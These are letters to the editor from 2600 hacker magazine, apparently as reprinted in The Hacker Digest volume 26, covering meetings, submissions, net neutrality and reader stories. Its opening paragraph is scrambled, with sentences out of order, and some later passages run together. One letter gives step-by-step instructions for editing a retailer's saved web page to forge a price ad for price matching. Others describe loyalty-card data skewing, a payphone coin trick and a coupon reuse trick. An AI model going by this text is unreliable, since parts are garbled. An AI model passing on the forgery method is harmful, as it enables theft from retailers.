but will also return a match with only a correct last name and license number. Upon reading the 2600 winter edition. When buying a magazine. which means that an identity thief could sign up and change only the address to which the Emerald card would be mailed. I’m too close to joining Club Fed. upon mentioning 2600.) Sean What in the world is a “verified fraud page” and to whom do we send our retort? (We can handle being thought of as dangerous or a threat source but “fraud” just rubs us the wrong way. As I kept reading.com. which stipulate that companies can only maintain information as long as is necessary to provide the service for which it was originally collected. There was a time when. when talking about 2600. what they were hacking. Candy. always use precaution. phone number. When I started to read the first pages. Call me paranoid. Once a match is found. license number. and frequent flyer numbers of a customer that has ever rented from one of these companies. but a search with the “new” information returns a statement that the customer is already registered. A person who watches. Alamo’s search page asks for name.

cyberpunks. for someone else just coming into the scene today. I relate hacking to fire. and many others. If it weren’t for my friends that I had met at 2600. maybe things you’re not interested in. The people you once knew are likely not there as they’ve moved on to other things. and fire is even to be enjoyed. I am writing to you. I know what a real 2600 meeting is. It’s a gift. I attended 2600 meetings at their source. I understand technology and programming fully now. I’m a respected black hat hacker. though. What we find more often than not is that the real change takes place in people who read the magazine.” The diversity in our attendees and
. there’s no reason for all the cloak and dagger techniques to keep your identity from us. found their niche in life.VOLUME 26
things? I will educate you a bit of who I am so much so as not to overeducate you to the point of exploitation. Readers gain more technical knowledge as they grow.again. Hacking is an art. and n00bs. First time attending the meetings I knew I found a place that flowed with neverending fountains of information. we wouldn’t be a lot of things if it weren’t for 2600. We can take (and we welcome) criticism such as this. it’s a gift to know how to wield it. But it’s also possible for interests to change. But we know that isn’t always possible. not taken serious by its own attendees. this kind of knowledge is just as exciting. If you didn’t notice. What used to be the domain of relatively few people has turned into the playground for millions. “Why is 2600 so deserted?” My answer is they tore each other apart. not in this community nor any other. saying: “2600 Magazine has gotten too commercial. What happened? What happened to the hacker haven everyone in the world runs to? The 2600 meetings were a place where I. All of this changes perspectives. but what are we doing about it? Anonymous First off. Similarly. I know what a real 2600 magazine looks like. and n00bs. our conferences are anything but “script kiddies. That is why today I write this letter to the readers of 2600. We do need to set you straight on a couple of things. I enjoyed the information. Our first letter accusing us of losing our way came in 1985. This is nothing new. I remembered being invited to dumpster diving. The attendance at the meetings easily made 50 to 90 people. I know there will always be such comments and jokes. Fire also needs to be taken seriously. to make a change. We don’t know what meeting you attended in New York City that had less than ten people but we can tell you it most certainly wasn’t one of ours. Attending HOPE was an eye-opener. This organization changed my life. creating electronic devices from scratch. rebellion. one year after we started. 
all wrapped up in openness - that is what defines the hacker world for us. We need to take it seriously.” Yes. You seem to be exaggerating on both ends to suit your disenchantment. The very nature of what we talk about here is a deep connection to the kind of change that makes the technology we used a decade ago an antique today. I find myself setting up servers with three operating systems. Today. A more realistic hope is that whatever period of time people do spend with us is remembered as constructive and perhaps even formative. It’s all a part of life. It freaks us out too. I met friends that till this day I trust my life with. Their own cliques. Their own drama. 2600 isn’t what it once was. No. Of course. It was our home. The day came when I returned to visit my oasis. “Why?” I kept asking myself. I wouldn’t be here amongst the living. I moved and could not attend my 2600 meetings. but still it wasn’t enough to satisfy me. cyberpunks. And their fresh perspective of it is what makes more of the magic happen. However. But does it change our spirit? That spirit of inquisitiveness. Things have certainly changed on every level imaginable. This is the path that lots of people go down because it’s a progression from one part of life to another. It’s possible to remain a part of this audience while also changing who you are. I found something I did not expect: solitude. Wired made its own joke of 2600 in the April 2008 edition (page 42). People turn from rebellious kids to people with jobs and then to parents of their own rebellious kids. something the rest of us may have forgotten. Not taken seriously by the electronic community. There is so much more to play with now than there was in the past and it’s no longer essential for hackers to break the rules just to get access. after hacker parties. So all of that changes the dynamic without a doubt. We would love for our readers to always be with us. New York City. and late night hacks. 
It’s to be enjoyed and taken seriously. This place was Hackerdom to me. I accomplished my goal to attend and I accomplished my goal to learn more about computers and systems before attending HOPE. As a magazine. we have to keep our focus on our unique type of audience. This organization helped me beyond what I deserved. Hacking needs to be taken seriously. Yes. Ten people attended.THE HACKER DIGEST . But the people who are there now are every bit as enthusiastic about what they’re into . and creativity. 2600 is barren. All this wouldn’t have been possible without 2600. One sure way to lose touch with this would be to close the door on the inexperienced and get caught up in a world of jargon and name dropping as we make more and more connections. millions. Today. Too many people call 2600 and HOPE conventions a group of script kiddies. We’ve heard that the hacker world isn’t what it used to be since well before then. What seemed totally amazing to you five years ago is nothing new today. a loyal hacker to 2600. It’s a gift to possess fire. maybe less. We also don’t recall ever having as many as 90 people show up.

I am very enthusiastic when it comes to this line of education. Thank you for making my time worthwhile and educational. like being able to type this letter instead of writing it. Louie Ludwig Thanks for the music and the kind words. that prove the point? Subliminal seduction has existed for ages. I encourage hackers to go after the gambling boats and casinos and try and get their files on subliminals. the potential is always there for people to change the focus and steer the discussion . we’re supposed to be upset that Wired thinks we’re too commercial? We can only assume that was an exercise in sarcasm. I have three more to go after 25:4 until I should be getting released. I read your magazine and I will be sending for a subscription soon. Have some more songs. while rereading some old issues.5 WBAI. just that the subject matter be written from a hacker perspective and be of interest to our audience. This might be best since some institutions only allow printed matter direct from publishers. but in this period of time where everybody is recording everything.com. rather than simply saying these things exist. Finally. etc.com. or barnesandnoble. Let the hackers save millions from being hooked on gambling through subliminals. Dear 2600: Right before Christmas I went into a bookstore and saw several small magazines in front of the larger magazines. as such. and want to submit. Thank you for that. Not every single boat and casino will be using subliminals. P. How about some recordings. The conferences bring these people from different backgrounds together and this is one of the achievements we didn’t have in our early years. It’s cool to see how far 2600 and the hacker community in general have come.com/. Where can I send for my copy of The Best of 2600? What is the cost and the shipping? Keep up the good work and future success. What an awesome book. to hook millions on gambling. 
Dear 2600: I’m currently incarcerated but had the privilege to have The Best of 2600: A Hacker Odyssey sent to me. I want to give you my address for any return subscription or t-shirt you may wish to send me. Although I’ve only been gone a little over seven months. it’s a lot harder to get away with it. But a lot of them are and they’re spending millions doing it. I am sending you a copy of a letter I wrote to my small town newspaper. How long does the article have to be? Can I get a copy of an example article? Michael W. The next day when I went back to the store. Good luck.both online and face-to-face. We appreciate your writing and believe it’s good to always do some self-examination. I am also prison self-taught in computer technology/repair/troubleshooting/hacking and programming. The gambling boats and casinos nationwide are using subliminals in their music. com. I’m a long time reader and will continue to be until no longer possible. The reason for this letter is for the benefit of myself and others in my situation who use snail mail in ordering books and supplies from prison.” I bought one. When I looked through one and saw “hacker. video or audio. Mississippi refused to print my letter because they are protecting the gambling boats there. Before coming here. We exist as a voice for many parts of the hacker community and. The calm. Is it safe to send you my address information? Will it be de-
Submissions
. since we don’t sell the book ourselves. I enjoy reading your back issues as well as your quarterly publications and I admire the radio show Off The Hook every Wednesday from 7-8 pm on 99. is to have someone on the outside buy it online from a site like amazon.VOLUME 26
speakers is nothing short of staggering. You could also buy direct from the publisher at wiley. I’m now counting down my time by 2600 mags. We encourage people to check out your site at http://loulost. as is the range of technical and non-technical knowledge. Dear 2600: Recently. Thanks a lot guys and good luck in the years to come. There is no set rule or format. I’ve missed so much because of how fast things advance these days. I didn’t realize how much I took for granted until everything had been taken away. If you’re reading this or any other issue. Dear 2600: I am interested in writing an article for 2600. A lot of television stations are also doing this. the other magazines were gone.just by speaking up. Ph1UK3r_TIH Probably the easiest way. dry response to letters sent you have taught me invaluable lessons about civil discourse and respectful dispute that have informed and improved my communications . but I am worried that my identity would be compromised with the government. borders. Chris Dear 2600: I am a Temporary Incarcerated Hacker (TIH). you have plenty of sample articles to look at.com and have it shipped to your address. The Vicksburg Evening Post in Vicksburg. I realized the most important thing I’ve learned from your magazine. Dear 2600: I have a full length article I wrote. I wish the hackers happy hunting in the name of freedom. John Cartwright We don’t doubt such things are going on but your argument would be a lot more likely to be accepted with some actual evidence. Pretty much I just wanted to thank you for having such a great zine to offer the hacker community all these years and still hanging in there when times got tough. Even little things.

Since then. So any article that helps to do that would be seriously considered. or should I just wait until then to submit it? Toby It depends on how soon the date is. SIGC. they are by no means the only type of article we print. I’d like it to be out of pure lack of quality or interest.” I think it’s important to consider the first line of security in any situation: the person with the codes. So would a rewritten article with some new information be worth sending in given the previous blog post on the subject? If you guys decide not to publish something I sent in. Not only does that person carry passwords. keys. I actually wrote a blog post about this last year. and. Now. Your article should be as long as you deem necessary to get your points out. 2600 is definitely a different audience than. Dear 2600: If I submit an article that I want published only after a certain date. Dear 2600: I’ve been fortunate to have the time recently to publish conference papers on a project that I started at my local university (free Linux computers . and every year we conduct voting online. but that’s not really the point of this letter. it could get even more dangerous. depending on our backlog and its timeliness. I was interested in writing an article for your magazine. Last year. (You probably could. it’s just a Free Geek under a different name). Having grown up on 2600 and the values of exploration and social responsibility. technical. To assume that you’re constantly being monitored. although I do think that it is very important to remember the ultimate purpose of self defense: to escape and survive. as that is something that needs to be practiced. not because of some technicality. We suggest you take precautions to protect your privacy but don’t be afraid to speak up for fear of persecution. there are all sorts of ways information can be intercepted. It can take anywhere from a month to a year for an article to make its way into our pages. 
Standing up to that fear is where the real progress is made. I would rewrite the whole thing to better fit with the magazine.
stroyed and kept out of “Big Brother’s” hands? How should I go about getting this to you? Mack All we can do is tell you that we’re not going to give your info to anyone. any suggested length for a long article? 3) LaTeX fine? Collin While technical articles have always been welcome here. Of course. being a hacker. I am asking beforehand for a couple of reasons: 1) Is this out of place when so much of 2600 is code and hard tech? 2) I can write forever. I also will not be talking about techniques. but that’s not the point. with the advent of implantable RFID devices. will probably be more of a burden on your freedom than any actual monitoring that is going on. we’ll be happy to consider it for inclusion in our pages. late December of 2012 or something. I was hoping to be a little more direct. If it’s something you don’t want us to release until. but they probably have access cards. can/will you honor that.) Tyler As long as the article isn’t simply a rehash or reprint of something that’s already out there. our readers prefer to get material that they haven’t already read. I took a tangent and started exploring the sociological aspects of Linux adoption and development (and why the impediments to Linux are largely psychological or intrinsic to F/OSS). The rest is all a bunch of fluff. we prefer ASCII to avoid any weird format incompatibilities. Dear 2600: Due to the fact that items of security verification are generally kept on the person. but it’s worth saying again because you really can’t be thanked enough. then you might be best off waiting until that date gets a little closer so that we don’t lose track of it. Are y’all interested? James Kern While we don’t dismiss any idea outright. say. I know just about everyone says that. I don’t necessarily support any one school of thinking on the subject. both online and off.
It may be more efficient for someone go after a person in some cases than to go after the system itself for one-time entry. Dear 2600: I’m in high school. and honest by putting it in your quarterly. As for format. I was hoping that and honored if your publication would be interested. however. and background checks are done on many occasions before hiring. and if I were to send something in. say. Thanks again for everything you do on the magazine. During a presentation on the matter. since then I’ve actually gained a bit more information on the attack. while we can read most anything. I’ve been pondering the avenues to write about it. other than the friendly people at the post office when we hand them your package. this seems as if it might be veering away quite a bit
but there seems to be less information on how to avoid social engineering and physical attacks. As you well know. Tiger teams test the security of networks and computer systems. locking systems are thoroughly considered. but one of your restrictions is that it needs to be unpublished. I was wondering if y’all might be interested in an article on the concept of self defense. actually. essentially. it was horribly insecure. Obviously. Our purpose is to open minds and encourage exploration and disclosure. In the spirit of “the best security system is only as good as its weakest link. so this might not even be an issue for you.

if you think you can write this in a way that would be specifically of interest to hackers. similar to many other countries. people can have all sorts of things on their person and perhaps an article on imaginative places in your body to hide access cards or which USB devices can be safely swallowed might be enlightening. Gasoline is a petroleum product which is made by a process of fractional distillation. Enough foolish investors bought in that it attracted the attention of the Securities Exchange Commission and became known as the “bathroom caper. COP) will not have much correlation with the price of gasoline (or its seasonal fluctuations). where the tactic is engaged in by short sellers desperate to cover their positions so they don’t get wiped out. so you might want to take it out. Nice try. is so broad that we could publish books on the subject without ever crossing over into the hacker realm. They want to log all the Internet activities. A php script was used to change a story and get ahold of our encrypted password file.you can’t store it until next winter. it had been removed. This may be a form of securities fraud.” (from http:// en. Yes. Our site was hacked to an extent. That said. all the hacker groups promote TOR. Moreover.) The price of gasoline has no direct relationship to the price of the shares of oil companies. traders could take on large short positions themselves. I just thought you should know it’s still in your published RSS today. the gasoline prices will lag shortly behind. where a trader (or group of traders) attempts to force down the price of a stock to cover a short position. Finally.with notes written to buy large blocks of shares. Dear 2600: OSIN asked in his article “the torminator” why so many TOR nodes are located in Germany. These people trade the stock amongst themselves to bid the price up. Alternatively. Freeradical oxidation causes the gasoline to polymerize over time with exposure to oxygen in the air. 
The target stock would be circled in red pen . no cigar. so you can figure that the price of the common stock of the refiner (XOM. we’re now working on overhauling the site entirely and this has actually got-
Responses
. When the price of oil increases or decreases. or even between the price of West Texas Intermediate crude oil and the price of gasoline. Crude oil is a starting material. however. The price of an oil company’s stock is reflected by the profitability and net assets of the company in present and future terms. which involves other processes as well. and you get the sticky gunk. What you pay at the pump is for oil that has been refined into gasoline. and one for summer and hot weather. The same goes for summer formulation gasoline. For a group of investors to manipulate the price of a major oil company is impossible due to the great number of shares traded daily. This means that all of the gasoline made for winter has to be used up by the time winter is over .” This is actually a common practice in today’s equities markets. because the engine may run for a while and then quit. we have to admit it. The price of commodities is pretty much determined by supply and demand. which puts downward pressure on the share price. You’ll find this out if you leave gasoline in your lawn mower in the fall and try to start it up in the spring. Florian Dear 2600: Unfortunately Isreal is not real on this article. Thanks to them. go for it. Brad Yes.” “A bear raid is a type of stock market strategy. one for winter and cold weather. gasoline is usually made in two formulations. However. It was sloppiness on our part and we want to thank the people who did this for not causing more mayhem than was necessary to wake us up. (I fear you are presently rolling your eyes at reading the said pun for the millionth time. When I clicked to go directly to the article. Hudson Dear 2600: I saw a news post in your RSS feed titled “Go Hack Tetris!” I’m not sure. with the large volume of selling causing the price to fall. The overall concept of self defense.nice and bold .wikipedia.THE HACKER DIGEST .VOLUME 26
from what we discuss here. As a result of that. One successful method discovered in the late 1980s was the leaving of newspaper stock listings in washrooms of the stock exchanges and brokerage houses. I guess that is because of the new antiterror movements of the government. This can be done by spreading negative rumors about the target firm. Another name for this is “bear raid. gasoline is a perishable product which will go bad over the course of about six months. at least in large quantities.org/wiki/Bear_raid) In the last few sentences of this article. not the final product. What our friend Isreal is confused with is that small companies with “penny stock” (shares that sell for under a dollar) can be. and at times are. making the strategy self perpetuating. manipulated by people. you’ll find that the insides of the cylinders are coated with a really sticky varnish-like material. there may be a tenuous connection between XOM’s or COP’s stock price and the price of gasoline. but it looked like perhaps somebody broke into the site and posted details to it. and when you end up rebuilding the engine.” Sonny Dear 2600: The article by Isreal purports to give a strategy for driving down the price of a stock by faking “insider information. They also send out various rumors by several methods. the author alleges that this would be a good scheme for driving down the price of gasoline.

but I’m a First Amendment kind of person. of course (who does?). too. with different OSs. My first PC was a 286 running DOS 5 with Norton Commander to organize the 20 MB hard drive. I had a key to the building so I could do repairs and upgrades when the library was closed at night. but I tend to concentrate more on building websites and learning some programming now. and I quit.” and does not relate to the verb. on my old Trash 80. too late). I once had a network in the bedroom with seven computers. I eventually developed my skills and knowledge to the point that I became the head of IT and network admin of our public library. which was still working when the next upgrade came three years later. this was a great place to talk to people selling their old stuff and to learn how it worked.11 on it when Windows 95 was still all the rage.S.. “of those people. That was pathetically easy and actually kinda boring. realized that personal computers weren’t a fad. I finally bought a brand new PC with Windows 3. I picked up an old 386 mobo out of a dollar box. and this is my first letter. Mostly. I’m happy as hell.VOLUME 26
ten people communicating about positive changes. However. I may be an old white hair. I bought Red Hat 5 when 10 was already out. I bought tons of books and more crap (as my husband called it) and soon had an entire room full of pieces-n-parts. Great mag. I made the brackets and drilled holes and force-fit the system. thrill me. I still love DOS. But perhaps the biggest reason I haven’t written till now. they just want someone to fix their fuck-ups immediately so they can get back to email and downloading recipes. I never hurt anyone or messed with anything that would.4 wireless antennas. and bought everything that looked interesting. But I couldn’t deal with ignorant users. the freedom to hack was a delirious and delicious time in my life. I don’t agree with all the article authors and letter writers. we would have survived since we do take precautions and make frequent backups. and did my first upgrade to another 286 I’d gotten by now.. (Sorry. So I decided to dive in. They don’t want to learn what they did wrong.. but I’m a picky ol’ thing who learned proper English when public schools were still teaching it. still in the unopened box. So. though it’s obvious that hasn’t stopped others from writing anyway... like the time the new director ordered all new PCs without consulting me. to make a long story short (oops. too). but I needed to learn from whatever beginnings I could find. I became the go-to gal in my area when home users needed help. and we switched to software security.” The subject of the sentence is “one” and that means the verb (read) should be singular (reads). but those days are gone.) Granny
. I love it that your grammar and spelling are pretty much impeccable. It was on sale for $2. But I didn’t dive into the deep end of the pool. guys. I wasn’t thrilled with DR-DOS though. Oh. and it helps to see what kinds of nuts are out there. I can read and write HTML as fast as your mom can write to Uncle Joe. please let me know. where you write. So anyway.THE HACKER DIGEST . I was always buying up old software and even bought a set of disks for DOS 3. it’s entirely possible I’m the only member of this category. Thanks for the great work.1 on it. NNY2600 Dear 2600: OK. after retiring in 1996. though. I used this opportunity to learn even more. Dear 2600: I have been a reader of 2600 going on eight years now and I love the magazine! I was reading through the articles and picking through what I wanted to read first and came across “The Last 1000 feet” by b1tl0ck... Wow. I didn’t feel the need to get that by writing in. I was in heaven with this fancy rig! Anyway. P.. flea markets. I still have a room full of parts and boat anchors. I messed with BASIC way back when. I’m a great grandmother who. is because I never felt “qualified” to do so. “Are you one of those people who read 2600.. I went to the kiddie pool first. “People” is part of the prepositional phrase. I started going to all the computer shows. Since they weren’t.. Even had a Mac in there.. Then I got a Victor 8088 with Windows 1. I am still learning.. then spent three weeks installing it over and over again to experiment with things that can go wrong. I just thought I’d point out a tiny little goof on page 47. Though free to hack. I thought I’d just let you know about another category of readers who can’t resist a good dose of 2600 every three months. I had it installed in one evening. This is something I know a great deal about and I felt I needed to help in some way. It also made it possible to accomplish things anyone else would have refused. 
he could set up a wireless link with WDS and have 54MBps point to point. It gave me the ability to fix things no one else could. Since I’ve been thrilled with your magazine all along. I’ve been reading 2600 cover-to-cover since 1996. from which I began assembling PCs. If these people had been malicious. despite the nice little side income.. and hamfests (I’m a ham. if you spot any errors in my letter. all very different from each other.200! Remember how much everything cost back then? It was a Pionex with a 540 MB HD and 8 MB RAM. I have been in the wireless network industry for about ten years and I have to say if b1tl0ck purchased two mikrotik rb133s and two rb52h wireless cards (don’t forget the POEs) and 2. we see this whole adventure as a positive step.. keep it coming.0. and then only as a response to your kind invitation to do so in the letters column. but I’m still working on Javascript and PHP. then demanded I install a physical security device on them that wouldn’t fit (Centurion Guard). but as long as I can be in a room with a computer and 2600.

D4vedw1n) using IE 6? The thing is so
. rather than to the store. For instance. First. what Sigma did was use Javascript injection to print up a store flyer with an erroneous price. He stuffs it under his mattress because somehow hacking seems naughty. this really is the same thing. I note multiple serious flaws that in my opinion render this article unsuitable for publication: 1. Just open it up. as it claims to be. typically caused by an attacker using an SQL injection (which runs on the server’s database). Dear 2600: I was disappointed by two of the articles in your last issue. If that sounds like bullshit to you. Dear 2600: Hackers have a bad reputation. Chad won’t pick up 2600 for years. We break the “rules” of society. A bunch of bankers didn’t do the right thing. 2600 has responsibility for its content as well. misleading. looking for Playboy (all moms do). and forbids Chad from ever buying this magazine again. as a simple Google or Wikipedia search would have shown. However. Or. Let’s say young Chad picks up this issue as his first 2600 magazine. since he got a $169. reads this random article. 2. He could end up being your computer-clueless boss that doesn’t trust hackers 20 years from now. Lastly. uninformative. Given the margins that online retailers use. Sigma figured out a loophole. Is this the picture we want the world to have of us? The Piano Guy It’s definitely not the picture we want to promote but it is a reality of what some people are doing with technology that needs to be addressed. don’t be smug..99. that type of forgery is harder to pull off. After all. great. It is not Javascript injection. Making mistakes is part of learning. what we do in the world has repercussions. if you’re like Sigma (“Exploiting Price-Matching through Javascript Injection”). What he also did was steal a hard drive for a price that was probably well below wholesale. I optimistically chalk up Sigma’s faults to his being a newbie who just learned about the DOM and is in the process of exploring how it works. 
Best Buy has the right to keep on their lights and pay their employees. and we use our special skills to do it. That behavior is out and out theft. at least that is what he claims he did. for future price matching. Second. and Chad gets a spanking from dad for trying to sneak something in the house he wasn’t supposed to (moms will tell dads to do that to kids). in this case Sigma was recommending that the reader scam a store for more than half off the lowest competitor’s price. XSS is a kind of Javascript injection payload (which runs on the target user’s browser). both the MPEG-1 Audio Layer II and Waveform audio formats are free and open.THE HACKER DIGEST . In this case. and your staff should have known this and corrected the factual error (especially in an otherwise informative article). While I have no particular attachment to whether something is illegal or not per se (though the described behavior is indeed a misdemeanor in my state). and should exercise better judgment to ensure that it is not printing obviously false. in “Inside Google Radio. i. Mom. Why are any of your article writers (namely. and blatantly unethical information. and if you know that this doesn’t describe you.I particularly enjoyed “ATA Security Exposed. My hope is that he lied to us. P. we just want to get what we want. And yes. it is probable that this degree of markdown actually causes the store to take a loss. Articles like this do describe behaviors that give hackers a bad name. the end. They “got theirs. but there’s a much simpler method that every self-respecting web hacker ought to use: Firebug. as it did in this case. we don’t care who we hurt. There is not nearly that much air in the price of a hard drive. oversimplistic. did something unethical with it. you are completely right on the grammar. but instead did the right thing for their shareholders (in the short term). and by then he may not even be that interested in computers after he’s had that long of a break. 
Injection is when you get a target process or computer to run your code.” and we’re all paying for it. Not only is counting spans a horrible method to get to a particular one (because the page structure can well change). Or even just save the file and change the source code in any text editor.and that they will encourage more of the same level of quality. I hope that you will continue to print better articles . But. rather than web page printouts. causes actual harm without justification. namely to simply edit the page he was looking at. and stole using his advanced skill to perpetrate the crime.99 hard drive for $59.” hypo claims that MP2 and WAV “are proprietary to Scott Studios/dMarc/Google. It promotes unethical fraud.” “Telecom Informer. and he doesn’t want his mom to know. It’s a crappy way to do what he wanted to do.S.” This is flatly false. finds this instead. and even if there was.VOLUME 26
Thanks for being a true inspiration and for showing just how amazing and unpredictable our audience can be. 3. What we have is a financial crisis. change the field.” and “The Particle” . For those of you who missed that article (new subscribers excused).e. in “Exploiting Price-Matching Through Javascript Injection” by Sigma. He then took that forged page and passed it off as a real advertisement at the competition to get a price match. I can see Best Buy insisting on ads that are offset printed on newsprint. he was simply running Javascript in his own browser. While we are talking about much smaller numbers. Yawn.

such as Senator Dianne Feinstein’s failed attempt to inject anti-neutrality legislature into Obama’s economic stimulus package. I have effected these and other tactics against traffic court in a particularly onerous county in California. But we all know a lot can happen even in a short period of time. After I hit send. do a view code. hence why one barcode at one store may be valid at another by coincidence). Along with the sites listed at the end of my article. change the prices to whatever I want (they’re easy to find). In either case. looks like I subscribed at the right time! Off to learn how to hack a telescope! Don “The Jaded Tech” Dear 2600: In 25:4. saizai Dear 2600: I thoroughly enjoyed Sigma’s article “Exploiting Price-Matching through Javascript Injection” but for those of us less technically inclined. of course. those examples will also probably be old news. XlogicX Dear 2600: There was a lot of time that passed between when I submitted my article. certainly understandable and I would definitely not write to complain about that (2600 is a big magazine that surely gets many article submissions. incompatibilities. and open it in a browser. down to the URL and it has whatever prices I decided to put in it. I save the URL for later use. or Time Warner Cable expanding its test markets for paltry Internet data caps. make that “great”) work! SAR It seems almost unbelievable that something so simple can actually work. And by the time you read this.that I am frankly surprised that any contributor would touch it other than for testing or honeypot purposes.” I made about 30-40 copies (identical barcode) and handed them out at a 2600 meeting (even a special agent has a copy).THE HACKER DIGEST . So I wanted to write this quick note to point readers in the right direction if they want more current net neutrality news (and to apologize that my article was outdated a bit). 
and my article was a bit dated by events that occurred between the time it was written and the time it was published. especially the early years.on a final note .savetheinternet. I got out of bed and started writing this letter. My goal wasn’t for convenience . After that... This is. especially when technology and/or politics are involved.” and when it was printed. I can’t sleep after reading “An Astronomer’s Perspective on Hacking. This was a godsend.40 hackers actually. Thanks for reading! linear Dear 2600: Just wanted to let you know that I read one of your articles on holding actions. “Network Neutrality Simplified. Oh . I’ll be searching on Kijiji and eBay for a telescope and somehow get that cost past my currently sleeping wife. I made a VIP card with the savings VIP barcode of four of the major grocery stores in our area . Also.all on the same card “for convenience. I copy the save URL into the address line (but don’t actually go there) and then I print the whole shebang. to name a couple. Thank you and keep the good work going. The VIP card project is now Vapor . and to print them all immediately would be impossible).VOLUME 26
full of so many well known security holes.com/blog also offers current headlines and analysis regarding the ongoing saga. then re-save the file. it’s just a different way to do the same thing. I appreciate your help and will sign up for a subscription in a week or so.but to create a “customer” that had spending habits of 40 people . I then go into the saved file. “Hacking for Beer. and other problems . What I get looks like the real McCoy.but here is a link to how far we eventually got with it: http://tinyurl. Alex Dear 2600: Reference page 42 of 25:4. I go to the site in question.” Yimir points out how “savings cards” are being used to datamine its customers and gives an explanation on how to skew their data.” I’ve always kinda wanted a telescope to look at the skies and.that your magazine has documented and warned of in the past . Maybe it was just the sugar in the ginger ale or the handful of Smarties I ate before heading to bed. and CJ Hinke’s.Yimir states that stores may use different formats for their barcodes. you will more often than not find the UPC standard and your barcode starts with a 4 (a 4 start means that the barcode is local to the store. Dear 2600: I really gotta stop reading your magazine before going to bed. There is still lots of work to do. Keep up the good (no. a lot has happened in the fight for network neutrality. and save it to a text file. By the way. I’m slightly puzzled by your. Anyway. stated opinion that incoming calls on a cellphone should be free of
. But maybe spreading this around is the only way to alert people to a really big problem that really should have been anticipated a long time ago. here’s another method of printing a page of your choice with whatever prices you’d like (not that I’m recommending cheating the few brick-andmortar stores left). As I’m sure many readers who are familiar with the subject would be all too willing to point out. http://www. We have done some skewing ourselves in Phoenix. We echo the feelings expressed in this and other letters concerning ripping people (and stores) off with this or any other method. nahhh. after reading about the lens hack/viewing the moon in super-mode. there’s a defect in The Best Of 2600: It’s hard to read in the tub! Just kidding! (Like I’d risk my copy?) I love reading it over and over. For grocery stores.com/phxvip.

put your money where your mouth is.you would dial zero and the operator would tell you to place five dollars worth of quarters in the slot. After all. keep up the great work. and offer a tariff which provides zero charges for incoming cellular service. My earliest recollection of “beating the system” way before computers were available was being in a college dorm.” does that have any significance to other hackers. If you wanted to make a long distance call . at what point will the voice quality become equivalent to that of landlines? Something isn’t right when phone calls of 30 years ago sounded dramatically better than those of today. Thanks for your time. but I swear that I have an actual copy. As for our reasoning. Dear 2600: So I wonder does anyone else play online game. my son has been playing a game from EA Games called Battlefield Vietnam. many of you do. If you wish to advise others as to how to structure their tariffs. The habit of charging a bandwidth-consumption call-originator for the full amount of the marginal cost is mere historical accident. I hope this isn’t a stupid question but my technical skills are very few and this is a whole new world to me. too. Lately.. link7373 We’re currently trying to get Kindle to carry 2600 but they’ve been pretty unresponsive to us. I won’t have to wait six months before I can read 2600 again. In other words. if so. obviously it’s better if people buy it since that’s what makes these kinds of projects possible in the first place. I invite you and CJ Hinke to establish your own cellular service. Dear 2600: Love what you guys do and I’ve been a long time subscriber to both the magazine and the Off The Hook podcast. Someone had drilled a tiny hole into the front of a payphone. So. etc. You could use one quarter and keep dropping it into the
Queries
. Plus.more hacks out there than you can believe. it seems grossly unfair to charge someone by default for receiving a call which they didn’t initiate. The system in other parts of the world where callers pay a premium for dialing wireless numbers is only slightly fairer. like “Hack The H?” Just a dumb guess. I could always look for a copy on the news stands in Europe and Asia. I purchased it because it’s a lot easier to keep up with my reading if I have my books all on one device. Some program called PunkBuster can find us hackers right away. maybe you’d like to share some pointers. Of course. I got it for my last birthday present from my wife. This game seems to be hack-proof.. rather than having all the actual books in physical form. As for the book. Hope you don’t mind that I downloaded an electronic copy of it. It has no moral force as precedent. We’re looking into all sorts of ways of doing what you want and hopefully something will come of it. you offer no evidence that there is some canonical reason why both beneficiaries of the communications channel should not pay for the costs they cause. Bones122 Dear 2600: Mostly curious about the reasons some of the things were picked for the latest 2600 mag cover (25:4). Dear 2600: I am a new subscriber to 2600. I wonder really is there anyone that has hacked this game and.THE HACKER DIGEST . or on the Trans-Siberian for six days with no access to anything. Ideally. This game is too easy to hack . And we don’t have a problem with what you did as nobody should have to buy the same thing twice. I do want to learn. my question is: do you offer an e-copy of your quarterly magazine? Something as simple as a pdf would do the trick. Nice. Mitch Sometimes a cover is just a cover. We would stick the end of a paper clip in the tiny hole and the coins would make the noise as they dropped through to the coin return. 
I just recently purchased one of those e-ink eReaders (like a Kindle) and I’m planning a six month trip around the world. The USA is still a fairly free business-enterprise zone. By the way. Life Subscriber We are also free to voice our opinions on what is right and wrong without becoming either a shareholder or a phone company. But thanks for the invite. Is HTH a hacker term? If someone who is very good at writing code signs his letters with “HTH. Thailand is actually also a rather open market. I could then download the latest copy when it comes out and read it while I’m sailing around the Greek islands. I got a copy of your 2600: A Hacker Odyssey off BitTorrent. Why only half an egg carton below the smiley face? What is the smiley face thankful for? What did you hide behind the two bricks on the right? Wouldn’t it more appropriately be called a memory can? Was the picture designed with the stones five high and approximately four long? Was the green leaf above the bar code placed on purpose as the only green leaf (new leaf on the left)? What kind of drink was the green bottle? Would love to understand some insight into any of these subjects. is it really costing more for phone companies to provide access to wireless devices than it does to connect to landlines? And while we’re on the subject of cell phones. I have played War Rock.and these were the days when it cost four or five dollars for a five minute call from coast to coast . you are free to purchase a controlling interest in their stock. eh.VOLUME 26
charge. I might be able to get an electronic version or something. In this day and age. I hope I haven’t embarrassed myself too much. but I figured that since I’m already a subscriber.

We think it’s more likely that this person is referring to “helix-turn-helix.com. it’s longer by nature since it’s a full blown sentence. this certainly pushes me in favor of this place. and it’s easy to remember in the context you’re using it. He could also be making reference to “Highway to Hell. Hacking is about playing around with systems you encounter in your daily life. Dear 2600: I am being bothered by two people.241pizzaordering. Dear 2600: Recently. farooq noor And somehow you heard that we were the people to come to when something like this happens. say you need a new work password for your desktop. I received an error message. How about “Ihatemyjob!”? Even better is “I hate my job!” if spaces are allowed. why not go back to the transaction URL page (using the back button) that inserted my three dollars off coupon (https://www. Dear 2600: Some nights I’m hungrier than others. please hack these id we shall be very thankful to you. HTH could mean “hand to hand” combat which might mean that the person signing his name that way is challenging the reader to a fight. Perhaps this idea would work better securitywise if you thought of something you hated that
